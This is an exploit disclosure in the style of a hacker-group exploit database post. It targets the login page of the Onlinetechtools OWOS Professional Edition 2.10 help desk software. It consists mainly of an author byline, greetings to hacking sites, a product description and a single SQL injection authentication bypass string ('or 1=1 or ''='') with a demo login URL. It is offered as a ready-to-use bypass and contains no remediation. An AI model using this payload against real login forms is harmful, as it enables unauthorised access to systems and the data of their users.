Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com] Exploit Title: Onlinetechtools OWOS: Professional Edition Authentication Bypass Vulnerability Version:2.10 Price:900$ Vendor url:http://www.onlinetechtools.com Published: 2010-11-02 Thanx to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic, M4n0j,SeeMe, Th3 RDX. Greetz to : Inj3ct0r Exploit DataBase (inj3ct0r.com) Special Greetz: Topsecure.net,0xr00t.com,Andhrahackers.com Shoutzz:- To all ICW & Inj3ct0r members. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Description: Work smarter with OWOS: Professional Edition, the web-based help desk solution. OWOS Pro helps you simplify support requests, e-mail communication, organize planning and scheduling, and provide powerful access to the information you need. Code: ASP 3.0 & VBScript .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Vulnerability: *Authentication ByPass Vulnerability* Pattern: ' or 1=1 or ''='' DEMO URL : http://www.onlinetechtools.com/demo/owospro210/login.asp?go=/demo/owospro210/default.asp&id= .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. # 0day n0 m0re # .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.